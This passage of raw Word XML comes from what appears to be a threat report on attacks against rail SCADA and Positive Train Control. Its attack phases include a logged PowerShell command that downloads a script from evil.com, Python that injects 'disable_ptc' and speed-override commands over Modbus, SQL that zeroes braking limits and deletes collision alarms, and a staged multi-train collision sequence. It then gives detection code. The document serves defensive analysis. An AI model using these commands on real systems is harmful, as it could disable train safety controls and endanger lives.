      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Strategic mobility severely degraded </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref61">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[61]</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f1ya6a7qllxh" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8u7nl98xvk2e" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: SCADA Infiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0883 - Internet Accessible Device </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref62">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[62]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d0rohedcwrs6" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Compromise Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Actual logs from rail SCADA compromise (sanitized)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Source: Incident Response Report [[63]](#ref63)</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[2025-01-12 03:24:17] IIS Log: 192.168.1.50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GET /InTouch/IOServer.aspx?cmd=shell HTTP/1.1 200</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User-Agent: Mozilla/5.0 (scanner)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[2025-01-12 03:24:45] Security Event 4624:</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Logon Type: 3 (Network)</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Account: SCADA\svc_historian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Source IP: 192.168.1.50</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Status: Success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[2025-01-12 03:25:33] PowerShell Execution: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Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe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Command: "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/stage2.ps1')"</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Parent: w3wp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bmotueu7x0tf" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: SCADA to PTC Pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0886 - Remote Services </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref64">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[64]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b7rq07wtrtgh" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Gateway Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># PTC command injection via SCADA interface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Reconstructed from forensic analysis [[65]](#ref65)</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import socket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import struct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class PTC_SCADA_Bridge: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def __init__(self, scada_ip, ptc_gateway):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self.scada = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</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self.scada.connect((scada_ip, 502))  # Modbus port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self.ptc_gw = ptc_gateway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def inject_ptc_command(self, train_id, command):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 Craft malicious SCADA point update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modbus_payload = self.craft_modbus_write(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register=40001,  # PTC command register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value=self.encode_ptc_cmd(train_id, command)</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 SCADA processes and forwards to PTC</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self.scada.send(modbus_payload)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 Gateway blindly trusts SCADA source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 No authentication between SCADA&lt;-&gt;PTC</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def encode_ptc_cmd(self, train_id, command):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 PTC expects specific format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 Discovered via reverse engineering</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cmd_map =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'emergency_stop': 0xFF01,</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'speed_override': 0xFF02,</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'route_change': 0xFF03,</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'disable_ptc': 0xFF04  # Most dangerous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return struct.pack('&gt;HH', train_id, cmd_map[command])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9w6up1v6ls0" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Safety System Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0832 - Manipulation of Control </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[66]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eb4oz49wp600" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling PTC Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- SQL injection in SCADA historian database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Links to PTC configuration tables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Source: Security assessment [[67]](#ref67)</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Step 1: Identify PTC configuration link</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SELECT * FROM dbo.SystemLinks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WHERE TargetSystem = 'PTC_GATEWAY';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Step 2: Modify safety thresholds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UPDATE PTC_Config.SafetyLimits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SET MaxSpeed = 999,</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BrakingDistance = 0,</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SignalOverride = 1</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WHERE TrainID = '*';  -- Affects all trains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Step 3: Disable alerting</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DELETE FROM PTC_Config.AlarmActions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WHERE AlarmType IN ('Overspeed','SignalViolation','CollisionRisk');</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SCADA historian has full DB access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Changes propagate to PTC in real-time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dn1mk92m22io" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Operational Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0831 - Manipulation of Control </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref68">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[68]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eovs2a912opk" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Train Collision Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Attack sequence for catastrophic outcome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Based on simulator testing [[69]](#ref69)</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attack_sequence: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 time: T+0</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action: Compromise dispatch SCADA</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result: Full system access achieved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 time: T+15min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action: Map train locations via SCADA</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result: Identify collision candidates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 time: T+30min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action: Disable PTC enforcement</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command: UPDATE PTC_Enable = FALSE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result: Safety systems bypassed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 time: T+45min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action: Manipulate signal aspects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command: Force GREEN on conflicting routes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result: Trains authorized same track</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 time: T+60min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action: Override dispatcher warnings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command: Suppress collision alerts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result: Human oversight defeated</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 time: T+75min</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action: Accelerate trains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command: Speed override via PTC</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result: Collision velocity maximized</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jpriu2pim2v" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iw2g797sna31" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive TTP Matrix</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sub-Technique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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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T0883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Internet SCADA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Perimeter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hyperlink w:anchor="ref70">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[70]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T0823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Graphical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HMI activity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hyperlink w:anchor="ref71">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[71]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T0839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Modify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Logic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hyperlink w:anchor="ref72">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[72]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T0874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Hooking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API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hyperlink w:anchor="ref73">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[73]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T0858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Change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Baseline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hyperlink w:anchor="ref74">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[74]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Credential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T0833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Modify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Configuration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hyperlink w:anchor="ref75">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[75]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T0840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Network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Traffic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hyperlink w:anchor="ref76">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[76]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Lateral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T0866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Exploit remote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Authentication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hyperlink w:anchor="ref77">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[77]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T0802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Automated collect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Data flow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hyperlink w:anchor="ref78">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[78]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T0831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Manipulate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Safety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hyperlink w:anchor="ref79">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[79]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xaoa127c5r4c" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA-Specific Techniques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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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Screen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T0852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HMI displays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Screenshot malware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hyperlink w:anchor="ref80">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[80]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Alarm Suppression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T0838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Alert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Database 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hyperlink w:anchor="ref81">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[81]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Data Historian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T0810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Trend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SQL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hyperlink w:anchor="ref82">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[82]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Rogue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T0848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Control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Protocol exploitation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hyperlink w:anchor="ref83">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[83]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dtbgysaby5wv" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000278">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wu81ahkvb92" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000279">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ejwhu9b11uo8" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA-PTC Bridge Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Deploy at integration points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Detects unauthorized command flows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from scapy.all import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import alerting</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class PTC_SCADA_Monitor:</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def __init__(self):</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self.baseline = self.load_baseline()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self.ptc_commands = set()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def analyze_packet(self, pkt):</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if pkt.haslayer(TCP) and pkt[TCP].dport == 502:</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 Modbus traffic to PTC gateway</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if self.is_ptc_write(pkt):</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command = self.extract_command(pkt)</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 Check against baseline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if command not in self.baseline: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alerting.critical(</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f"Unauthorized PTC command via SCADA: {command}",</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packet=pkt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 Detect rapid commands (exploit indicator)</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self.ptc_commands.add((command, time.time()))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if self.detect_command_flood():</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alerting.critical("PTC command flood detected")</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def detect_command_flood(self):</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 More than 10 commands in 60 seconds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recent = [t for c,t in self.ptc_commands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if time.time() - t &lt; 60]</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return len(recent) &gt; 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i2x5d3o7cq04" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Activity Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Real-time detection of PTC table modifications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Deploy on SCADA historian database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CREATE TRIGGER PTC_Security_Monitor</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ON PTC_Config.SafetyLimits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AFTER UPDATE, DELETE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AS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BEGIN</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DECLARE @user VARCHAR(100) = SYSTEM_USER</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DECLARE @action VARCHAR(10) =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CASE WHEN EXISTS(SELECT * FROM deleted)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AND EXISTS(SELECT * FROM inserted) THEN 'UPDATE'</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WHEN EXISTS(SELECT * FROM deleted) THEN 'DELETE'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END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 Alert on any safety limit changes</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IF @action IS NOT NULL</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BEGIN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INSERT INTO Security.Alerts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Timestamp, Severity, Message, Username, Details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 VALUES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GETDATE(),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'CRITICAL',</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'PTC Safety Configuration Modified',</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@user,</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(SELECT * FROM deleted FOR JSON AUTO)</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 Trigger immediate SOC notification</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EXEC msdb.dbo.sp_send_dbmail</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@recipients = 'soc@railroad.com',</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@subject = 'CRITICAL: PTC Safety Modification',</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@body = 'Immediate investigation required'</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END</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END</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ne6yu1jowepa" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w8c26mi2dh4g" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
